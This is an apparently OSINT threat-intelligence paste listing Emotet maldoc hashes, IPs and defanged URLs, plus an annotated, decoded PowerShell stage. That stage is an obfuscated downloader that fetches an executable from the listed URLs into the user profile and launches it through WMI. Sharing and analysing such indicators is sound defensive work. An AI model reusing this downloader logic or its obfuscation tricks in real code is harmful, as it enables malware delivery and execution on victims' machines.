paladin316

Emotet_Doc_out_2020-07-29_12_37.txt

Jul 29th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4.  
  5. 5710b01ee4d0e978814cc2610a9cd3a20fd8761101b3a3de4f63b51679796c0a
  6. c5bbf4092543589c22f0825343fa7ce06916a0f4a79eead16b2319086e03753e
  7. a98f960e08eea28006d1b9d0faa43f9a4fc83062c9c33c1dbe5ed020a8cd51ff
  8. 474aa52b41ab44c8795ca65e5c5b2b4f84fff4811c77a8791c86d035b45bb3f2
  9. d1a85b09f9e7e505603adf98d73ac1e4b3b2725bf969a557cc01c147f2daa4e6
  10. 5c1dfeb8604d2025639c0e95ecb77106b9536467e5a6e86af0ade6b684ed0f60
  11. b055c91beadcc69f982e372bba82ce74efcb003bb9c2fc772efae1a27beb3387
  12. d3ee72ffbd93738908ddb2ee2fe2330cdc187dde05a8aa4d8ebcf62bf5c521cd
  13. 216102bcebe04d591b4e71990d8be1e9e7877519c4f27dcf01df2cdbd4f935c1
  14. 5efb249ce7b7d1f83f218c8187b1c8cee43bde68bfcf524bc21d8821e448c5eb
  15. 8bcb81a90d9831d9b0ffd723b83b907cbf0011de32de2cb18c01cbd66b11d47e
  16. 0ded8527f3fd10bea37326e5ea52ae190eb531638d8e0f4203d1e2fe9112af1e
  17. e24a991609898738c00e796e782e19eedb6d767fb20c7e87bff3fb8f58fb1b66
  18. 29142d1b50c19825901b0907408eb52d7962cff9742b7c0dcd550b7aabbab2e6
  19. abbadc25a1fb109c75ed4598fcf4b1e85e7b90faf37dc756f6ad2aedc32eb874
  20. 47c345c8baedb045d6e15b8a66cddee16cdeafc7b87f4538e9b147e92e5a1a25
  21. 1248c5b60260f9fd6d61589cc8d8d63da798c15d292ce54800199401fcb99972
  22. 1025216058d489f910a0436f2fc8da78f7b0c69707130f006d627744e413067a
  23. d5c02f77a90c627c04faa9dabbeb7271d11a7df0749d07af987994c830ea0657
  24. f9e21c32753d07b9af540aa838505f4aab10a1fc3e670affaae3c322976891ff
  25. df3f07a28988e65741321c968afd02eaf8a49fa2dcf2e2f2685d04e13a236122
  26. 3d58123ccd88ada2e760b9bf07db9231cc706ced206f123f1972e3a154458729
  27. 0691c15ed061527f264577df6eeed7d15df552eb791e35a50c432dbe6312bdf7
  28. 9e6b07432484371908b25279a80c78f3f717726fdc1cee80af1458b9dcdd92bf
  29. efbdd4a2e805ca7a03f7b2ee982cca0593c6795e98eb322db0c78535a7d6ec8f
  30. dd1fe9f11a267149ce356a768d071605c1972fd10d1f7a57a29fe8a2c8fb41c1
  31. ca72f5e3246923867063647a971ebfab60e5a66e1af8d1f9187419756dc94215
  32. 8ac91d2ac91bacb58cff376537c53f917eb9a260fe9d73e83e1622ae1330999a
  33. 365c53ae77c38b76a767821812d50e9e2fadb0f2c6b356508307bf9933649e2b
  34. 745208b9589c716bfe12fb99f5d6fe5e713fabb7097d8629a75a114584b2cec5
  35. 89c0676d70b229ef63b2b04b4a00aec67e5b583e4d8ca3eb06434f7fffae1dbb
  36. ec58eee07fffa7a7af0387949a025a2ed4f748060d7420dc53316cb6b9a332e3
  37. 80c2733aec99f5aab73c4555949f84ae4ebf7369955d07fa9a0c4a8d06265fe3
  38.  
  39. IPs:
  40. 116.90.60.13
  41. 162.216.4.226
  42. 207.58.184.66
  43. 208.78.173.10
  44. 213.171.197.190
  45.  
  46. Domains:
  47.  
  48. henney.net
  49. jenerationz.com
  50. smdcomputers.com
  51. stcswim.com
  52. www.ramms.com.au
  53.  
  54.  
  55. hxxp://www.ramms.com.au/fodico/it_na0x8_nykhe/
  56. hxxp://stcswim.com/tj_fk_6/
  57. hxxp://smdcomputers.com/libraries/3tv_vzx_z3g/
  58. hxxp://jenerationz.com/icon/os/css/4ekl8_lwj_c6d0/
  59. hxxp://henney.net/misc/exl_x_f6p8tnz/
  60.  
  61.  
  62. Decoded Base64 PowerShell:
  # Decoded Emotet maldoc stage: a PowerShell downloader that tries a list of URLs,
  # writes the payload to the user profile and runs it. The script is left byte-for-byte
  # as pasted (it is an evidentiary artifact); comments below explain what each line does.
  #
  # Obfuscation visible here: method/property names are written with backticks inside
  # double-quoted strings (PowerShell drops a backtick before an ordinary character, so
  # "Cre`Ate" resolves to Create), cmdlet names are built from concatenated fragments and
  # invoked via & / ., and a number of variables are assigned once and never read again
  # ($woetsopzooj, $thecgesmean, $heixbedjithchin, $zeachmeuh, $xarseim, $munweofquuag,
  # $haezzaevluachquaiqu, $jaogyeoqu) — filler, presumably to vary the sample. A string
  # match on the plain names SecurityProtocol / New-Object / DownloadFile / Get-Item / Create
  # would therefore miss this text; detection has to work on decoded/executed content.
  63. $woetsopzooj='noiykoen';
  # Sets [Net.ServicePointManager]::SecurityProtocol to 'tls12, tls11, tls'
  # (member name written as "SEcuRIT`y`pROtocOl").
  64. [Net.ServicePointManager]::"SEcuRIT`y`pROtocOl" = 'tls12, tls11, tls';
  # File-name stem of the dropped payload.
  65. $duanyothneay = '985';
  66. $thecgesmean='kiequbeox';
  # Drop path: %USERPROFILE%\985.exe (an .exe written directly into the profile root).
  67. $youtgeowguax=$env:userprofile+'\'+$duanyothneay+'.exe';
  68. $heixbedjithchin='tachseuhdoeququeub';
  # &('ne'+'w-'+'obje'+'ct') evaluates to New-Object; creates a Net.WebClient.
  69. $yeovchiofthuum=&('ne'+'w-'+'obje'+'ct') nET.WeBclient;
  # Payload URL list — the same five URLs as the hxxp list above ("hxxp" is the
  # defanging convention, presumably http in the live sample). The string is split on
  # [char]42, i.e. '*', so in the original sample the URLs were presumably '*'-delimited;
  # the paste shows them on separate lines instead.
  70. $yiwveadboas='hxxp://www.ramms.com.au/fodico/it_na0x8_nykhe/
  71. hxxp://stcswim.com/tj_fk_6/
  72. hxxp://smdcomputers.com/libraries/3tv_vzx_z3g/
  73. hxxp://jenerationz.com/icon/os/css/4ekl8_lwj_c6d0/
  74. hxxp://henney.net/misc/exl_x_f6p8tnz/'."S`pLiT"([char]42);
  75. $zeachmeuh='taolquussaitfaem';
  # For each URL: WebClient.DownloadFile(url, %USERPROFILE%\985.exe).
  76. foreach($heezdielsos in $yiwveadboas){try{$yeovchiofthuum."DownLO`Adf`ilE"($heezdielsos, $youtgeowguax);
  77. $xarseim='heawrok';
  # Size gate: only if (Get-Item path).Length is at least 38683 bytes is the file
  # started, via the WMI Win32_Process.Create method; a too-small download (e.g. an error
  # page) is left on disk and the loop moves to the next URL.
  78. If ((.('G'+'et'+'-Item') $youtgeowguax)."Len`G`TH" -ge 38683) {([wmiclass]'win32_Process')."Cre`Ate"($youtgeowguax);
  79. $munweofquuag='xiangoofnievchur';
  # Stop after the first URL that yields a large-enough file.
  80. break;
  # catch{} swallows every exception, so an unreachable URL fails silently and the
  # next one is tried. Detection opportunities: powershell.exe creating an .exe in the
  # profile root, and a Win32_Process.Create call originating from powershell.exe.
  81. $haezzaevluachquaiqu='luuvcoth'}}catch{}}$jaogyeoqu='jimpoerwaez'
  82.  